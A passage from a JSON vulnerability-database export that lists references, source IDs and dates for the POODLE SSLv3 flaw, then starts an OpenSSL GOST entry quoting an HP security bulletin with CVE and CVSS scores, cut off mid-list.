"http://www1.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-405500.htm" }, { "trust": 1.1, "url": "https://access.redhat.com/articles/1232123" }, { "trust": 1.1, "url": "https://blog.mozilla.org/security/2014/10/14/the-poodle-attack-and-the-end-of-ssl-3-0/" }, { "trust": 1.1, "url": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_openssl6" }, { "trust": 1.1, "url": "https://bto.bluecoat.com/security-advisory/sa83" }, { "trust": 1.1, "url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1076983" }, { "trust": 1.1, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1152789" }, { "trust": 1.1, "url": "https://devcentral.f5.com/articles/cve-2014-3566-removing-sslv3-from-big-ip" }, { "trust": 1.1, "url": "https://github.com/mpgn/poodle-poc" }, { "trust": 1.1, "url": "https://groups.google.com/forum/#%21topic/docker-user/oym0i3xshju" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04819635" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05068681" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05157667" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05301946" }, { "trust": 1.1, "url": "https://ics-cert.us-cert.gov/advisories/icsma-18-058-02" }, { "trust": 1.1, "url": "https://puppet.com/security/cve/poodle-sslv3-vulnerability" }, { "trust": 1.1, "url": "https://security.netapp.com/advisory/ntap-20141015-0001/" }, { "trust": 1.1, "url": "https://support.apple.com/ht205217" }, { "trust": 1.1, "url": "https://support.apple.com/kb/ht6527" }, { "trust": 1.1, "url": "https://support.apple.com/kb/ht6529" }, { "trust": 1.1, "url": "https://support.apple.com/kb/ht6531" }, { "trust": 1.1, "url": "https://support.apple.com/kb/ht6535" }, { "trust": 1.1, "url": "https://support.apple.com/kb/ht6536" }, { "trust": 1.1, "url": "https://support.apple.com/kb/ht6541" }, { "trust": 1.1, "url": "https://support.apple.com/kb/ht6542" }, { "trust": 1.1, "url": "https://support.citrix.com/article/ctx216642" }, { "trust": 1.1, "url": "https://support.lenovo.com/product_security/poodle" }, { "trust": 1.1, "url": "https://support.lenovo.com/us/en/product_security/poodle" }, { "trust": 1.1, "url": "https://technet.microsoft.com/library/security/3009008.aspx" }, { "trust": 1.1, "url": "https://www-01.ibm.com/support/docview.wss?uid=swg21688165" }, { "trust": 1.1, "url": "https://www.arista.com/en/support/advisories-notices/security-advisories/1015-security-advisory-7" }, { "trust": 1.1, "url": "https://www.cloudera.com/documentation/other/security-bulletins/topics/csb_topic_1.html" }, { "trust": 1.1, "url": "https://www.dfranke.us/posts/2014-10-14-how-poodle-happened.html" }, { "trust": 1.1, "url": "https://www.elastic.co/blog/logstash-1-4-3-released" }, { "trust": 1.1, "url": "https://www.imperialviolet.org/2014/10/14/poodle.html" }, { "trust": 1.1, "url": "https://www.openssl.org/news/secadv_20141015.txt" }, { "trust": 1.1, "url": "https://www.openssl.org/~bodo/ssl-poodle.pdf" }, { "trust": 1.1, "url": "https://www.suse.com/support/kb/doc.php?id=7015773" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2014-10/msg00008.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00001.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00011.html" }, { "trust": 1.0, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10705" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=141450452204552\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=141450973807288\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=141477196830952\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=141576815022399\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=141577087123040\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=141577350823734\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=141620103726640\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=141628688425177\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=141694355519663\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=141697638231025\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=141697676231104\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=141703183219781\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=141715130023061\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=141775427104070\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=141813976718456\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=141814011518700\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=141879378918327\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=142103967620673\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=142118135300698\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=142296755107581\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=142350196615714\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=142350298616097\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=142350743917559\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=142354438527235\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=142357976805598\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=142495837901899\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=142496355704097\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=142546741516006\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=142607790919348\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=142624590206005\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=142624619906067" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=142624619906067\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=142624679706236\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=142624719706349\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=142660345230545\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=142721830231196\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=142721887231400\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=142740155824959\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=142791032306609\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=142804214608580\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=142805027510172\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=142962817202793\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=143039249603103\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=143101048219218\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=143290371927178\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=143290437727362\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=143290522027658\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=143290583027876\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=143558137709884\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=143558192010071\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=143628269912142\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=144101915224472\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=144251162130364\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=144294141001552\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=145983526810210\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=openssl-dev\u0026m=141333049205629\u0026w=2" }, { "trust": 1.0, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10090" }, { "trust": 1.0, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10091" }, { "trust": 1.0, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10104" }, { "trust": 0.8, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.8, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.7, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.2, "url": "https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetsea" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-5139" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=141577350823734\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=141576815022399\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=141620103726640\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=141697638231025\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=141703183219781\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=141697676231104\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=141775427104070\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=141814011518700\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=141715130023061\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=141813976718456\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=142118135300698\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=142296755107581\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=142354438527235\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=142350743917559\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=142350196615714\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=142350298616097\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=142357976805598\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=142962817202793\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=143290371927178\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=144294141001552\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=145983526810210\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=141450973807288\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=142721887231400\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=142660345230545\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=142804214608580\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=141450452204552\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=141628688425177\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=141577087123040\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=141694355519663\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=141879378918327\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=143290583027876\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=143628269912142\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=143039249603103\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=142624619906067\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=142495837901899\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=143290522027658\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=142624719706349\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=143290437727362\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=142624590206005\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=142624679706236\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=142740155824959\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=142721830231196\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=142791032306609\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=144101915224472\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=142103967620673\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=143558137709884\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=143558192010071\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=142805027510172\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=142546741516006\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=144251162130364\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=141477196830952\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=143101048219218\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=142496355704097\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=142624619906067" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=142607790919348\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=openssl-dev\u0026amp;m=141333049205629\u0026amp;w=2" }, { "trust": 0.1, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026amp;id=jsa10705" }, { "trust": 0.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026amp;id=sb10090" }, { "trust": 0.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026amp;id=sb10091" }, { "trust": 0.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026amp;id=sb10104" }, { "trust": 0.1, "url": "https://www.apple.com/support/security/pgp/" }, { "trust": 0.1, "url": "http://gpgtools.org" }, { "trust": 0.1, "url": "http://support.apple.com/kb/ht1222" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/" }, { "trust": 0.1, "url": "http://h20564.www2.hp.com/hpsc/swd/public/readindex?sp4ts.oid=5263732\u0026swlango" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0224" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6271" }, { "trust": 0.1, "url": "http://h20564.www2.hp.com/hpsc/swd/public/readindex?sp4ts.oid=5331223\u0026swlango" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-57ab6bb78b6e47a18718f44133" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-2557aa7dc1654cf6b547c1a9e4" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-7b23e47d5d9b420b94bd1323eb" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6585" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openjdk-6/6b34-1.13.6-1ubuntu0.10.04.1" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0407" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6587" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0412" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6591" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0408" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0400" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openjdk-6/6b34-1.13.6-1ubuntu0.12.04.1" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0383" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6593" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6601" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0395" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0410" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_n" }, { "trust": 0.1, "url": "http://www.hpe.com/support/security_bulletin_archive" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2842" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0800" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0705" }, { "trust": 0.1, "url": "https://www.hpe.com" }, { "trust": 0.1, "url": "https://h20392.www2.hpe.com/" }, { "trust": 0.1, "url": "http://www.hpe.com/support/subscriber_choice" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0799" }, { "trust": 0.1, "url": "http://www.hp.com/go/insightremotesupport/docs" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3567" }, { "trust": 0.1, "url": "http://security.freebsd.org/patches/sa-14:23/openssl-8.4.patch" }, { "trust": 0.1, "url": "http://www.freebsd.org/handbook/makeworld.html\u003e." }, { "trust": 0.1, "url": "http://security.freebsd.org/patches/sa-14:23/openssl-9.3.patch.asc" }, { "trust": 0.1, "url": "http://svnweb.freebsd.org/base?view=revision\u0026revision=nnnnnn\u003e" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3513\u003e" }, { "trust": 0.1, "url": "http://security.freebsd.org/patches/sa-14:23/openssl-10.0.patch.asc" }, { "trust": 0.1, "url": "http://security.freebsd.org/\u003e." }, { "trust": 0.1, "url": "http://security.freebsd.org/advisories/freebsd-sa-14:23.openssl.asc\u003e" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3513" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3568" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3566\u003e" }, { "trust": 0.1, "url": "http://security.freebsd.org/patches/sa-14:23/openssl-9.3.patch" }, { "trust": 0.1, "url": "http://security.freebsd.org/patches/sa-14:23/openssl-10.0.patch" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3568\u003e" }, { "trust": 0.1, "url": "http://security.freebsd.org/patches/sa-14:23/openssl-8.4.patch.asc" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3567\u003e" }, { "trust": 0.1, "url": "https://www.hp.com" } ], "sources": [ { "db": "VULHUB", "id": "VHN-71506" }, { "db": "PACKETSTORM", "id": "128732" }, { "db": "PACKETSTORM", "id": "129426" }, { "db": "PACKETSTORM", "id": "133368" }, { "db": "PACKETSTORM", "id": "130644" }, { "db": "PACKETSTORM", "id": "131011" }, { "db": "PACKETSTORM", "id": "130125" }, { "db": "PACKETSTORM", "id": "130334" }, { "db": "PACKETSTORM", "id": "130817" }, { "db": "PACKETSTORM", "id": "136577" }, { "db": "PACKETSTORM", "id": "129401" }, { "db": "PACKETSTORM", "id": "128808" }, { "db": "PACKETSTORM", "id": "132469" }, { "db": "NVD", "id": "CVE-2014-3566" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-71506" }, { "db": "PACKETSTORM", "id": "128732" }, { "db": "PACKETSTORM", "id": "129426" }, { "db": "PACKETSTORM", "id": "133368" }, { "db": "PACKETSTORM", "id": "130644" }, { "db": "PACKETSTORM", "id": "131011" }, { "db": "PACKETSTORM", "id": "130125" }, { "db": "PACKETSTORM", "id": "130334" }, { "db": "PACKETSTORM", "id": "130817" }, { "db": "PACKETSTORM", "id": "136577" }, { "db": "PACKETSTORM", "id": "129401" }, { "db": "PACKETSTORM", "id": "128808" }, { "db": "PACKETSTORM", "id": "132469" }, { "db": "NVD", "id": "CVE-2014-3566" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-10-15T00:00:00", "db": "VULHUB", "id": "VHN-71506" }, { "date": "2014-10-17T15:10:30", "db": "PACKETSTORM", "id": "128732" }, { "date": "2014-12-09T23:13:22", "db": "PACKETSTORM", "id": "129426" }, { "date": "2015-08-28T19:02:22", "db": "PACKETSTORM", "id": "133368" }, { "date": "2015-03-05T14:44:00", "db": "PACKETSTORM", "id": "130644" }, { "date": "2015-03-25T00:41:42", "db": "PACKETSTORM", "id": "131011" }, { "date": "2015-01-28T00:26:54", "db": "PACKETSTORM", "id": "130125" }, { "date": "2015-02-10T17:43:07", "db": "PACKETSTORM", "id": "130334" }, { "date": "2015-03-13T17:11:14", "db": "PACKETSTORM", "id": "130817" }, { "date": "2016-04-06T13:28:14", "db": "PACKETSTORM", "id": "136577" }, { "date": "2014-12-05T15:08:08", "db": "PACKETSTORM", "id": "129401" }, { "date": "2014-10-22T19:54:29", "db": "PACKETSTORM", "id": "128808" }, { "date": "2015-06-29T15:36:03", "db": "PACKETSTORM", "id": "132469" }, { "date": "2014-10-15T00:55:02.137000", "db": "NVD", "id": "CVE-2014-3566" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2023-02-13T00:00:00", "db": "VULHUB", "id": "VHN-71506" }, { "date": "2023-09-12T14:55:31.563000", "db": "NVD", "id": "CVE-2014-3566" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "136577" }, { "db": "PACKETSTORM", "id": "129401" } ], "trust": 0.2 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Apple Security Advisory 2014-10-16-4", "sources": [ { "db": "PACKETSTORM", "id": "128732" } ], "trust": 0.1 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "info disclosure", "sources": [ { "db": "PACKETSTORM", "id": "130125" } ], "trust": 0.1 } }
var-201201-0049
Vulnerability from variot
The GOST ENGINE in OpenSSL before 1.0.0f does not properly handle invalid parameters for the GOST block cipher, which allows remote attackers to cause a denial of service (daemon crash) via crafted data from a TLS client. Fiery Network Controllers for Xerox DocuColor 242/252/260 Printer/Copier use a vulnerable version of OpenSSL (0.9.8o). OpenSSL prone to multiple security vulnerabilities. An attacker may leverage these issues to obtain sensitive information, cause a denial-of-service condition and perform unauthorized actions. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c03360041
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c03360041 Version: 1
HPSBMU02786 SSRT100877 rev.1 - HP System Management Homepage (SMH) Running on Linux and Windows, Remote Unauthorized Access, Disclosure of Information, Data Modification, Denial of Service (DoS), Execution of Arbitrary Code
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2012-06-26 Last Updated: 2012-06-26
Potential Security Impact: Remote unauthorized access, disclosure of information, data modification, Denial of Service (DoS), execution of arbitrary code
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP System Management Homepage (SMH) running on Linux and Windows. The vulnerabilities could be exploited remotely resulting in unauthorized access, disclosure of information, data modification, Denial of Service (DoS), and execution of arbitrary code.
References: CVE-2011-1944, CVE-2011-2821, CVE-2011-2834, CVE-2011-3379, CVE-2011-3607, CVE-2011-4078, CVE-2011-4108, CVE-2011-4153, CVE-2011-4317, CVE-2011-4415, CVE-2011-4576, CVE-2011-4577, CVE-2011-4619, CVE-2011-4885, CVE-2012-0021, CVE-2012-0027, CVE-2012-0031, CVE-2012-0036, CVE-2012-0053, CVE-2012-0057, CVE-2012-0830, CVE-2012-1165, CVE-2012-1823, CVE-2012-2012 (AUTOCOMPLETE enabled), CVE-2012-2013 (DoS), CVE-2012-2014 (Improper input validation), CVE-2012-2015 (Privilege Elevation), CVE-2012-2016 (Information disclosure), SSRT100336, SSRT100753, SSRT100669, SSRT100676, SSRT100695, SSRT100714, SSRT100760, SSRT100786, SSRT100787, SSRT100815, SSRT100840, SSRT100843, SSRT100869
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP System Management Homepage (SMH) before v7.1.1 running on Linux and Windows.
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2012-2012 (AV:N/AC:L/Au:N/C:C/I:C/A:P) 9.7 CVE-2012-2013 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2012-2014 (AV:N/AC:M/Au:S/C:N/I:N/A:N) 6.8 CVE-2012-2015 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 6.5 CVE-2012-2016 (AV:L/AC:M/Au:S/C:C/I:N/A:N) 4.4 CVE-2011-1944 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2011-2821 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2011-2834 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2011-3379 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2011-3607 (AV:L/AC:M/Au:N/C:P/I:P/A:P) 4.4 CVE-2011-4078 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2011-4108 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2011-4153 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2011-4317 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2011-4415 (AV:L/AC:H/Au:N/C:N/I:N/A:P) 1.2 CVE-2011-4576 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2011-4577 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2011-4619 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2011-4885 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2012-0021 (AV:N/AC:H/Au:N/C:N/I:N/A:P) 2.6 CVE-2012-0027 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2012-0031 (AV:L/AC:L/Au:N/C:P/I:P/A:P) 4.6 CVE-2012-0036 